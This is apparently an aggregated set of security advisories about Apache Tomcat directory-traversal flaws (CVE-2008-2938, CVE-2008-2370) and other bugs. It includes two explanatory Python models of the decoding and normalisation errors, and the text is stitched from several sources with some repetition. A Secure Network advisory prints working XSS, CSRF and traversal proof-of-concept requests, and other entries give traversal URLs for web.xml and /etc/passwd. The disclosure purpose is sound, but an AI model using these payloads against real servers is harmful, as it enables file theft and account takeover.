denial-of-service conditions.
(CAN-2005-1987)
VU#922708 - Microsoft Windows Shell fails to handle shortcut files
properly
Microsoft Windows Shell does not properly handle some shortcut files
and may permit arbitrary code execution when a specially-crafted file
is opened.
(CAN-2005-0163)
II. An attacker may also be able to cause a
denial of service.
III. Solution
Apply Updates
Microsoft has provided the updates for these vulnerabilities in the
Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the following US-CERT Vulnerability Notes for workarounds.
Appendix A. References
* Microsoft Security Bulletin Summary for October 2005 -
<http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx>
* US-CERT Vulnerability Note VU#214572 -
<http://www.kb.cert.org/vuls/id/214572>
* US-CERT Vulnerability Note VU#883460 -
<http://www.kb.cert.org/vuls/id/883460>
* US-CERT Vulnerability Note VU#922708 -
<http://www.kb.cert.org/vuls/id/922708>
* US-CERT Vulnerability Note VU#995220 -
<http://www.kb.cert.org/vuls/id/995220>
* US-CERT Vulnerability Note VU#180868 -
<http://www.kb.cert.org/vuls/id/180868>
* US-CERT Vulnerability Note VU#950516 -
<http://www.kb.cert.org/vuls/id/950516>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#680526 -
<http://www.kb.cert.org/vuls/id/680526>
* CAN-2005-2120 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2120>
* CAN-2005-1987 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1987>
* CAN-2005-2122 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2122>
* CAN-2005-2128 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2128>
* CAN-2005-2119 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2119>
* CAN-2005-1978 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1978>
* CAN-2005-2127 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2127>
* CAN-2005-0163 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0163>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
_________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA05-284A.html>
_________________________________________________________________
Feedback can be directed to US-CERT. Please send email to:
<cert@cert.org> with "TA05-284A Feedback VU#959049" in the subject.
_________________________________________________________________
Revision History
Oct 11, 2004: Initial release
_________________________________________________________________
Produced 2005 by US-CERT, a government organization.
Terms of use
<http://www.us-cert.gov/legal.html>
_________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/>.
VAR-200808-0154 | CVE-2008-2938 |
Apache Tomcat UTF8 Directory Traversal Vulnerability
Related entries in the VARIoT exploits database: VAR-E-200703-0008, VAR-E-200703-0006, VAR-E-200703-0005, VAR-E-200703-0007, VAR-E-200703-0002, VAR-E-200703-0001, VAR-E-200703-0003, VAR-E-200703-0004, VAR-E-200607-0003 |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. Multiple Java runtime implementations are prone to a vulnerability because the applications fail to sufficiently sanitize user-supplied input.
Exploiting this issue in Apache Tomcat will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks. Other attacks may also be possible.
Exploiting this issue in other applications will depend on the individual application. Successful exploits may result in a bypass of intended security filters. This may have various security impacts. We will update this BID pending further investigation.
UPDATE (December, 18, 2008): Reports indicate that this issue may affect additional, unspecified Java Virtual Machine (JVM) implementations distributed by Sun, HP, IBM, Apple, and Apache. We will update this BID as more information becomes available.
UPDATE (January 9, 2009): This BID previously documented an issue in Apache Tomcat. Further reports indicate that the underlying issue is in various Java runtime implementations.
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servlet Engine are contained in the Apache Web Server Suite.
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servlet Engine v5.5.27.01.01 or earlier
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference       Base Vector                     Base Score
CVE-2007-6420   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2008-1232   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2008-1947   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2008-2364   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    5.0
CVE-2008-2370   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    5.0
CVE-2008-2938   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2008-2939   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    4.3
CVE-2008-3658   (AV:N/AC:M/Au:N/C:N/I:P/A:N)    7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
URL: http://software.hp.com
Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
MANUAL ACTIONS: Yes - Update
Install Apache-based Web Server or Tomcat-based Servlet Engine from the Apache Web Server Suite v3.02 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
hpuxwsTOMCAT.TOMCAT
hpuxwsWEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.23
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.31
==================
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 2 February 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
© Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
CVE-2008-2938: Apache Tomcat information disclosure vulnerability - Update 2
Severity: Important
Vendor:
Multiple (was The Apache Software Foundation)
Versions Affected:
Various
Description (new information):
This vulnerability was originally reported to the Apache Software Foundation as
a Tomcat vulnerability. Investigations quickly identified that the root cause
was an issue with the UTF-8 charset implementation within the JVM.
It was decided to continue to report this as a Tomcat vulnerability until such
time as the JVM vendors had released fixed versions.
Unfortunately, the release of fixed JVMs and associated vulnerability disclosure
has not been co-ordinated. There has been some confusion within the user
community as to the nature and root cause of CVE-2008-2938.
Mitigation:
Contact your JVM vendor for further information.
Tomcat users may upgrade as follows to a Tomcat version that contains a workaround:
6.0.x users should upgrade to 6.0.18
5.5.x users should upgrade to 5.5.27
4.1.x users should upgrade to 4.1.39
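Added example (not code from Tomcat, the JVM vendors or the Apache announcement) that makes the root cause above concrete: a deliberately lenient UTF-8 decoder that accepts overlong sequences, Python's strict decoder, and a small model of the vulnerable ordering (traversal check on the still-encoded URI, then decoding, then file lookup relative to the docBase). The request paths, the use of the overlong two-byte form of '.' in the sample, and the helper names `lenient_utf8`, `strict_utf8` and `resolve` are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes


def lenient_utf8(data: bytes) -> str:
    """Deliberately permissive UTF-8 decoder standing in for the flawed
    charset implementation: it trusts the lead byte's announced length and
    never checks that the code point actually needed that many bytes, so an
    overlong sequence such as C0 AE decodes to U+002E ('.')."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            cp, n = b, 1
        elif b >> 5 == 0b110:
            cp, n = b & 0x1F, 2
        elif b >> 4 == 0b1110:
            cp, n = b & 0x0F, 3
        elif b >> 3 == 0b11110:
            cp, n = b & 0x07, 4
        else:
            raise UnicodeDecodeError("utf-8", data, i, i + 1, "invalid lead byte")
        if i + n > len(data):
            raise UnicodeDecodeError("utf-8", data, i, len(data), "truncated sequence")
        for j in range(1, n):
            if data[i + j] >> 6 != 0b10:
                raise UnicodeDecodeError("utf-8", data, i, i + j + 1, "bad continuation")
            cp = (cp << 6) | (data[i + j] & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


def strict_utf8(data: bytes) -> str:
    """Python's built-in decoder: rejects overlong forms, C0/C1 lead bytes,
    surrogates and truncated sequences, the behaviour a fixed JVM (or a
    container-side workaround) has to provide."""
    return data.decode("utf-8")


def resolve(uri_path: str, decoder) -> str:
    """Model the vulnerable ordering: the container looks for '..' segments
    in the still-encoded request path, then percent-decodes and charset-
    decodes it, and the file system resolves whatever comes out relative
    to the docBase. Returns a verdict string."""
    if ".." in uri_path.split("/"):
        return "rejected: traversal in URI"
    try:
        decoded = decoder(unquote_to_bytes(uri_path))
    except UnicodeDecodeError:
        return "rejected: malformed UTF-8"
    rel = posixpath.normpath(decoded.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        return "ESCAPED docBase -> " + rel
    return "ok -> " + rel


# Constructed request paths: a plain one, an obvious traversal, and one that
# spells '..' with overlong two-byte sequences (C0 AE for each '.').
PLAIN_URI = "/index.html"
OBVIOUS_TRAVERSAL_URI = "/../WEB-INF/web.xml"
OVERLONG_URI = "/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"

if __name__ == "__main__":
    for uri in (PLAIN_URI, OBVIOUS_TRAVERSAL_URI, OVERLONG_URI):
        print(f"{uri}\n  lenient: {resolve(uri, lenient_utf8)}"
              f"\n  strict:  {resolve(uri, strict_utf8)}")
```

The same overlong input is rejected outright by the strict decoder, which is why the fix belongs in the charset implementation rather than in a URI-level '..' filter.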
Credit:
This additional information was discovered by the Apache security team.
This release updates Tomcat to 5.5.27, which patches several security
vulnerabilities.
Affected Products
=================
The WiKID Strong Authentication Server - Enterprise Edition
The WiKID Strong Authentication Server - Community Edition
References
==========
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
Mitigation
==========
Commercial users may download the most recent RPMs from the website:
http://www.wikidsystems.com/downloads/
Users of the open source community version may download packages from
Sourceforge:
https://sourceforge.net/project/showfiles.php?group_id=144774
--
Nick Owen
WiKID Systems, Inc.
404-962-8983 (desk)
http://www.wikidsystems.com
Two-factor authentication, without the hassle factor.
A cross-site scripting vulnerability was found in the
HttpServletResponse.sendError() method which could allow a remote
attacker to inject arbitrary web script or HTML via forged HTTP headers
(CVE-2008-1232).
A cross-site scripting vulnerability was found in the host manager
application that could allow a remote attacker to inject arbitrary
web script or HTML via the hostname parameter (CVE-2008-1947).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938
_______________________________________________________________________
Updated Packages:
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
In these configurations arbitrary files in the docBase for an application,
including files such as web.xml, may be disclosed.
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
Secure Network - Security Research Advisory
Vuln name: ToutVirtual VirtualIQ Pro Multiple Vulnerabilities
Systems affected: ToutVirtual VirtualIQ Professional 3.2 build 7882
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.toutvirtual.com
Author(s): Alberto Trivero (a.trivero@securenetwork.it)
Claudio Criscione (c.criscione@securenetwork.it)
Vendor disclosure: 02/07/2009
Vendor acknowledged: 16/07/2009
Vendor patch release: notified us on 06/11/2009
Public disclosure: 07/11/2009
Advisory number: SN-2009-02
Advisory URL: http://www.securenetwork.it/advisories/sn-2009-02.txt
*** SUMMARY ***
ToutVirtual's VirtualIQ Pro is specifically designed for IT administrators
responsible for managing virtual platforms. VirtualIQ Pro provides
Visibility, Analytics and policy-based Optimization - all from one single
console. VirtualIQ Pro is hypervisor-agnostic supporting both Type I and Type
II hypervisors. VirtualIQ Pro can be used to visualize, analyze and
optimize your choice of virtualization platform - Citrix, Microsoft,
Novell, Oracle and/or VMware.
Multiple vulnerabilities have been found which allow an attacker to conduct
various XSS and CSRF attacks, and other attacks due to the use
of an old and not hardened version of the web server.
*** VULNERABILITY DETAILS ***
(a) Cross-site scripting (XSS)
Due to an improper sanitization of user's input, multiple XSS attacks
(reflective and stored) are possible.
Reflective PoCs:
http://server:9080/tvserver/server/user/setPermissions.jsp?userId=1"><script>alert(1)</script>&resultResourceIds=111-222-1933email@address.tst
http://server:9080/tvserver/server/user/addDepartment.jsp?addNewDept=0&deptName=%22;alert(1);//&deptId=1&deptDesc=asd
http://server:9080/tvserver/server/inventory/inventoryTabs.jsp?ID=1;alert(1);//
http://server:9080/tvserver/reports/virtualIQAdminReports.do?command=getFilter&reportName=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
Stored XSS attacks can be triggered in the "Middle Name" parameter in the
"Edit Profile" page with an HTTP request like the following:
POST /tvserver/user/user.do?command=save&userId=1 HTTP/1.1
Host: server:9080
Cookie: JSESSIONID=[...]
userName=IQMANAGER&firstName=IQ&middleName=asd';
alert(document.cookie);//&lastName=MANAGER&email=user%40domain.it&password=********&retypePassword=********&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1
(b) Cross-site request forgery (CSRF)
An attacker can perform different types of CSRF attacks against a logged-in user.
He can, for example, shut down, start or restart an arbitrary
virtual machine, schedule new activities and so on.
The following HTTP request, if forged by the attacker and executed by the
victim while logged on to VirtualIQ, creates an arbitrary user:
POST /tvserver/user/user.do?command=save&userId= HTTP/1.1
Host: server:9080
Cookie: JSESSIONID=[...]
userName=asd1&firstName=asd2&middleName=asd3&lastName=asd4&email=asd5%40asd.com&password=asd6&retypePassword=asd6&redirect=null&passwordModifed=false&isReportUser=false&roleId=1&supervisorId=1&departmentId=1&locationId=1
(c) Web server vulnerabilities
VirtualIQ runs on top of an old version of Apache Tomcat: 5.5.9, for which
multiple public vulnerabilities have been released. As a
PoC, a directory traversal attack (CVE-2008-2938)
can be performed as:
http://server:9080/tvserver/server/%C0%AE%C0%AE/WEB-INF/web.xml
Listing of an arbitrary directory (CVE-2006-3835) can also be obtained with
the following PoC:
http://192.168.229.85:9080/tvserver/server/;index.jsp
(d) Information Leakage
The Tomcat status page should be disabled or restricted; it is accessible at:
http://status:9080/status
Username and password to access a VM through SSH are also available in clear
text in the configuration page.
Since an XSS vulnerability can also be triggered in the same page, an attacker
would also be able to easily capture the full credentials to access
the VM with a specially crafted XSS payload.
*** FIX INFORMATION ***
Upgrade to the latest version, at the moment 3.5 build 10.14.2009
*** WORKAROUNDS ***
--
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
whenever possible with software developers for properly handling disclosure.
This advisory is copyright 2009 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit is given to Secure Network. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24 12 67 88
--
Claudio Criscione
Secure Network S.r.l.
Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia
Tel: +39 02.24126788 Mob: +39 392 3389178
email: c.criscione@securenetwork.it
web: www.securenetwork.it
VAR-200808-0011 | CVE-2008-2370 |
Multiple PHP XML-RPC implementations vulnerable to code injection
Related entries in the VARIoT exploits database: VAR-E-200808-0268 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. Apache Tomcat is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain the contents of sensitive files stored on the server. Information obtained may lead to further attacks.
The following versions are affected:
Tomcat 4.1.0 through 4.1.37
Tomcat 5.5.0 through 5.5.26
Tomcat 6.0.0 through 6.0.16
Tomcat 3.x, 4.0.x, and 5.0.x may also be affected.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
CVE-2008-2370: Apache Tomcat information disclosure vulnerability
Severity: Important
Vendor:
The Apache Software Foundation
Versions Affected:
Tomcat 4.1.0 to 4.1.37
Tomcat 5.5.0 to 5.5.26
Tomcat 6.0.0 to 6.0.16
The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be also affected
Description:
When using a RequestDispatcher the target path was normalised before the
query string was removed. A request that included a specially crafted
request parameter could be used to access content that would otherwise be
protected by a security constraint or by its location under the WEB-INF
directory.
Mitigation:
6.0.x users should upgrade to 6.0.18
5.5.x users should obtain the latest source from svn or apply this patch
which will be included from 5.5.27
http://svn.apache.org/viewvc?rev=680949&view=rev
4.1.x users should obtain the latest source from svn or apply this patch
which will be included from 4.1.38
http://svn.apache.org/viewvc?rev=680950&view=rev
Example:
For a page that contains:
<%
pageContext.forward("/page2.jsp?somepar=someval&par="+request.getParameter("blah"));
%>
an attacker can use:
http://host/page.jsp?blah=/../WEB-INF/web.xml
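How the ordering error plays out on the advisory's own example, as an added illustration in Python rather than Tomcat's code: normalize_path is a simplified model of servlet path normalisation, FORWARD_PREFIX mirrors the JSP snippet above, and the two resolve functions differ only in whether the query string is removed before or after normalisation. The is_protected check is the kind of guard a dispatcher or filter applies to the resolved path; all names here are this example's, not Tomcat's.

```python
"""Model of the CVE-2008-2370 ordering bug on the advisory's example.

Added illustration, not Tomcat source: the container's behaviour is modelled
in a few lines so the effect of normalising before or after query removal
can be seen directly.
"""
from urllib.parse import parse_qs

# Mirrors the JSP in the advisory:
#   pageContext.forward("/page2.jsp?somepar=someval&par=" + request.getParameter("blah"))
FORWARD_PREFIX = "/page2.jsp?somepar=someval&par="

# Content a servlet container must never hand out directly (constructed list).
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def normalize_path(path):
    """Collapse '.' and '..' segments (simplified model of servlet path normalisation)."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def forward_target(blah):
    """Build the dispatcher target string exactly as the page's JSP does."""
    return FORWARD_PREFIX + blah


def resolve_vulnerable(target):
    """Affected order: normalise the whole string, then drop the query.

    Because the '?' is still present during normalisation, a '..' inside a
    parameter value pops the real path segment and walks into WEB-INF.
    """
    normalised = normalize_path(target)
    return normalised.split("?", 1)[0]


def resolve_fixed(target):
    """Corrected order: split off the query first, normalise only the path part.

    Returns (path, params). The parameter keeps its '..' as inert data that
    the forwarded page receives via getParameter, not as a path component.
    """
    path, _, query = target.partition("?")
    return normalize_path(path), parse_qs(query, keep_blank_values=True)


def is_protected(path):
    """Defensive check on a resolved dispatcher path, as a filter could apply."""
    return path.startswith(PROTECTED_PREFIXES)


if __name__ == "__main__":
    target = forward_target("/../WEB-INF/web.xml")  # the advisory's request input
    print("vulnerable order ->", resolve_vulnerable(target))
    path, params = resolve_fixed(target)
    print("fixed order      ->", path, params)
```

Running it shows the vulnerable order resolving to /WEB-INF/web.xml, which is_protected flags, while the fixed order resolves to /page2.jsp and leaves the traversal sequence harmlessly inside the `par` parameter.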
Credit:
This issue was discovered by Stefano Di Paola of Minded Security Research
Labs.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01650939
Version: 1
HPSBUX02401 SSRT090005 rev.1 - HP-UX Running Apache Web Server Suite, Remote Denial of Service (DoS), Cross-site Scripting (XSS), Execution of Arbitrary Code, Cross-Site Request Forgery (CSRF)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2009-02-02
Last Updated: 2009-02-02
Potential Security Impact: Remote Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, cross-site request forgery (CSRF)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP-UX running Apache-based Web Server or Tomcat-based Servlet Engine. The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS), cross-site scripting (XSS), execution of arbitrary code, or cross-site request forgery (CSRF). Apache-based Web Server and Tomcat-based Servlet Engine are contained in the Apache Web Server Suite.
References: CVE-2007-6420, CVE-2008-1232, CVE-2008-1947, CVE-2008-2364, CVE-2008-2370, CVE-2008-2938, CVE-2008-2939, CVE-2008-3658
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.23 and B.11.31 running Apache-based Web Server v2.2.8.01.01 or earlier or Tomcat-based Servlet Engine v5.5.27.01.01 or earlier
HP-UX B.11.11 running Apache-based Web Server v2.2.8.01.01 or earlier
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
CVE-2007-6420 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1232 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-1947 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2364 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2370 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 5.0
CVE-2008-2938 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-2939 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3
CVE-2008-3658 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 7.5
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
RESOLUTION
HP has provided the following upgrades to resolve these vulnerabilities.
The upgrades are available from the following location:
URL: http://software.hp.com
